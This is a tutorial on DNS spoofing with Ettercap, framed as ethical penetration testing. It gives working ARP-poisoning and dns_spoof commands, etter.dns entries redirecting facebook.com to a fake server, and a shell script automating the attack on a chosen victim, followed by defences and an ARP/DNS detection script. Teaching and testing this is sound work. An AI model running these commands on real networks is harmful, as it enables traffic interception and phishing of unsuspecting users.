DNS Spoofing with Ettercap (For Ethical Penetration Testing Only)

DNS spoofing is an attack in which an attacker answers a victim's DNS queries with forged responses, so that a domain name resolves to an address the attacker controls instead of the real one. In the setup below the attacker sits between the victim and the router (ARP poisoning), sees every query the victim sends and replies before the real resolver can; the victim's browser then loads the attacker's server, typically a phishing page or a fake login form, under the genuine host name. Use this only on networks you own or have explicit permission to test; unauthorized use is illegal.


1. Setting Up Ettercap for DNS Spoofing

Step 1: Install Ettercap (If Not Installed)

On Kali Linux (or any other Debian-based system, including a Kali container under Termux), install Ettercap with:

bash

sudo apt update && sudo apt install ettercap-text-only -y

or

bash

sudo apt install ettercap-graphical -y # For GUI version

Step 2: Enable IP Forwarding

Before running Ettercap, enable packet forwarding:

bash

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Once the ARP poisoning is in place, the victim's packets arrive at your machine instead of at the router. With forwarding enabled the kernel passes them on, so the victim keeps its connectivity and notices nothing; without it the victim loses its network connection, which is both a giveaway and a denial of service. Reading the file back should print 1. The setting does not survive a reboot, which is what you want on a test machine.

Step 3: Configure DNS Spoofing

  1. Edit the Ettercap DNS Spoofing File
    Open the etter.dns file:

    bash

    sudo nano /etc/ettercap/etter.dns

    Add an entry for the domain you want to spoof. Each line has the form hostname, record type, value. The wildcard form matches subdomains only, so list the bare name and the wildcard separately. For example, to send www.facebook.com and every other facebook.com subdomain to a fake web server on the LAN (e.g. 192.168.1.100):

    text

    www.facebook.com A 192.168.1.100
    *.facebook.com A 192.168.1.100

    Save and exit (CTRL+X, then Y, then ENTER). In a lab it is better to spoof a domain you own or a made-up one: for a real HTTPS site the browser rejects the fake server's certificate, so the redirect is visible rather than silent.

  2. Adjust the Ettercap configuration file
    Open etter.conf:

    bash
    sudo nano /etc/ettercap/etter.conf

    Near the top, set the privilege-drop user and group to root:

    ini

    ec_uid = 0
    ec_gid = 0

    These default to 65534 (nobody); Ettercap drops its privileges to that user and group after start-up, and keeping root avoids permission errors from plugins. Leave the commented-out redir_command_on / redir_command_off lines alone: they hold the iptables rules Ettercap uses to redirect port 443 for SSL interception and are not needed for dns_spoof.


2. Running Ettercap for DNS Spoofing

Option 1: Using GUI

  1. Open Ettercap GUI:
    bash

    sudo ettercap -G
  2. Start Unified Sniffing and choose your network interface (e.g. eth0 or wlan0).
  3. Go to Hosts → Scan for hosts, then open Hosts → Hosts list and add the router to Target 1 and the victim to Target 2.
  4. Go to Mitm → ARP poisoning and tick "Sniff remote connections" (the GUI equivalent of arp:remote in the CLI form below).
  5. Go to Plugins → Manage plugins and double-click dns_spoof to activate it. The plugin reads etter.dns when it is activated, so edit the file before this step.

Option 2: Using CLI (Command Line)

To perform ARP poisoning and DNS spoofing against every host Ettercap has found on the subnet:

bash

sudo ettercap -T -q -i wlan0 -M arp:remote // // -P dns_spoof
  • -T → Text mode (no GUI)
  • -q → Quiet mode (do not print every packet)
  • -i wlan0 → Interface (change if needed)
  • -M arp:remote → ARP poisoning; remote makes Ettercap also handle traffic that passes through the router to hosts beyond it, which is needed when the victim's resolver is not the router itself
  • // // → Two empty target specs, i.e. every host on the subnet as both Target 1 and Target 2
  • -P dns_spoof → Load the dns_spoof plugin

Poisoning the whole subnet is noisy and, if forwarding fails, can take every host on the network offline. In a test, target one victim and the router instead:

bash

sudo ettercap -T -q -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.50/ -P dns_spoof

Replace:

  • 192.168.1.1 → Router IP
  • 192.168.1.50 → Victim’s IP
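Putting sections 1 and 2 together, the following added example (not Ettercap's own code, and not from the original page) wraps the etter.dns edit, the forwarding flag and the Ettercap run in one POSIX shell script that cleans up after itself. The interface wlan0, the router 192.168.1.1, the victim 192.168.1.50, the fake server 192.168.1.100 and the domain example.test are assumed lab values; it uses the same target syntax as the command above. Without --run it only defines the helper functions, so the generated records and command line can be inspected before anything is touched.

```bash
#!/bin/sh
# Added lab helper (not part of Ettercap). Assumed values: interface wlan0,
# router 192.168.1.1, victim 192.168.1.50, fake web server 192.168.1.100,
# spoofed domain example.test. Run as root with --run; without it only
# the helper functions are defined.
ETTER_DNS=/etc/ettercap/etter.dns
FWD=/proc/sys/net/ipv4/ip_forward

# Print the two etter.dns records that send a domain and its subdomains
# to the fake server ("*." matches subdomains only, hence two lines).
etter_dns_entries() {
    printf '%s A %s\n' "$1" "$2"
    printf '*.%s A %s\n' "$1" "$2"
}

# Build the ettercap command line for one router/victim pair.
# arp:remote is kept so that DNS traffic going through the router to an
# external resolver is intercepted too.
ettercap_cmd() {
    printf 'ettercap -T -q -i %s -M arp:remote /%s/ /%s/ -P dns_spoof\n' "$1" "$2" "$3"
}

# Accept only a dotted quad, so an empty or mistyped value cannot turn
# the two-host test into a subnet-wide poisoning run.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Undo both changes on exit (also on Ctrl-C), so the lab host is not
# left with spoof entries and forwarding enabled.
restore() {
    [ -f "$ETTER_DNS.bak" ] && mv "$ETTER_DNS.bak" "$ETTER_DNS"
    [ -n "$orig_fwd" ] && echo "$orig_fwd" > "$FWD"
}

run_lab() {
    iface=$1; router=$2; victim=$3; fake=$4; domain=$5
    if ! is_ipv4 "$router" || ! is_ipv4 "$victim" || ! is_ipv4 "$fake"; then
        echo "refusing to run: bad IPv4 address" >&2
        return 1
    fi
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    orig_fwd=$(cat "$FWD")
    trap restore EXIT INT TERM
    cp "$ETTER_DNS" "$ETTER_DNS.bak"
    etter_dns_entries "$domain" "$fake" >> "$ETTER_DNS"
    echo 1 > "$FWD"
    cmd=$(ettercap_cmd "$iface" "$router" "$victim")
    echo "running: $cmd"
    $cmd      # runs until you press q; restore() then cleans up
}

if [ "${1:-}" = "--run" ]; then
    run_lab wlan0 192.168.1.1 192.168.1.50 192.168.1.100 example.test
fi
```

The backup-and-restore of etter.dns and of the ip_forward value is the part most tutorials omit: leaving spoof records in the file or forwarding enabled on the test machine is how a lab setup leaks into later, unrelated work.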

3. Testing the Attack

On the victim's machine, first clear any cached answer (a record already in the resolver cache is not queried again until it expires), then look up www.facebook.com with nslookup or dig; the answer should be 192.168.1.100 rather than a Facebook address. A browser test needs a caveat: www.facebook.com is an HTTPS site with HSTS, so the browser refuses the fake server's certificate and shows an error page instead of the phishing page. To see a silent redirect, spoof a plain-HTTP lab domain served from 192.168.1.100.


4. How to Protect Against DNS Spoofing

  • Use HTTPS with HSTS – A spoofed address still receives the connection, but the fake server cannot present a valid certificate for the real name, so the browser blocks the page instead of showing a login form.
  • Use Secure DNS (DoH or DoT) – Queries are encrypted to the resolver, so an on-path attacker cannot read them and has nothing to answer; dns_spoof only works on plain-text DNS.
  • Monitor ARP Tables – Run arp -a and look for two IP addresses (typically the gateway and another host) that share one MAC address; that is the signature of ARP poisoning.
  • Use Static ARP Entries – A static entry for the gateway is not overwritten by forged ARP replies; practical for a few critical hosts, not for a large LAN, where Dynamic ARP Inspection on managed switches does the same job.
  • Use Network Intrusion Detection Systems (NIDS) – Tools like Snort or arpwatch detect ARP spoofing (one MAC claiming several IPs, or a MAC change for the gateway).
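The ARP-table and resolver checks above, as an added example (not Ettercap code and not from the original page). The ARP table is a constructed sample in Linux "arp -a" format with made-up addresses and MACs, and the two DNS answers at the end are made up as well; on a real host the same functions take arp -a and dig +short output.

```bash
#!/bin/sh
# Added detection example (not Ettercap code). The ARP table below is a
# constructed sample in Linux "arp -a" format; the addresses and MACs
# are made up, as are the two DNS answers compared at the end.

# Print every MAC address that the ARP table maps to more than one IP.
# While ARP poisoning is active the attacker's MAC appears for both the
# gateway and the victim, which a healthy LAN never shows. Reads
# "arp -a" lines on stdin: "? (192.168.1.1) at aa:bb:... [ether] on wlan0".
arp_shared_macs() {
    awk '$3 == "at" && $4 ~ /:/ {
             ip = $2; gsub(/[()]/, "", ip)
             ips[$4] = ips[$4] " " ip
         }
         END {
             for (m in ips)
                 if (split(ips[m], parts, " ") > 1)
                     printf "%s shared by%s\n", m, ips[m]
         }' | sort
}

# Compare the answer set from the local resolver with one from an
# out-of-band resolver (for example DoH over another network). Both
# arguments are newline-separated address lists as "dig +short" prints
# them; order is ignored so round-robin rotation does not raise alarms.
dns_answer_check() {
    local_set=$(printf '%s\n' "$1" | sort -u)
    ref_set=$(printf '%s\n' "$2" | sort -u)
    if [ "$local_set" = "$ref_set" ]; then
        echo ok
        return 0
    fi
    echo "MISMATCH local=[$(echo $local_set)] reference=[$(echo $ref_set)]"
    return 1
}

# Constructed sample: the victim's table while the attacker at
# aa:bb:cc:dd:ee:ff is poisoning the gateway (192.168.1.1) entry.
SAMPLE_ARP='? (192.168.1.1) at aa:bb:cc:dd:ee:ff [ether] on wlan0
? (192.168.1.77) at aa:bb:cc:dd:ee:ff [ether] on wlan0
? (192.168.1.20) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.1.99) at <incomplete> on wlan0'

# Demo on the sample; on a real host use:  arp -a | arp_shared_macs
printf '%s\n' "$SAMPLE_ARP" | arp_shared_macs
dns_answer_check '192.168.1.100' '203.0.113.10' || true
```

The ARP check is the cheaper of the two because it needs no second network path, but it only catches the ARP-poisoning variant; the answer comparison also catches a compromised or rogue resolver, at the price of needing a reference resolver the attacker does not sit in front of.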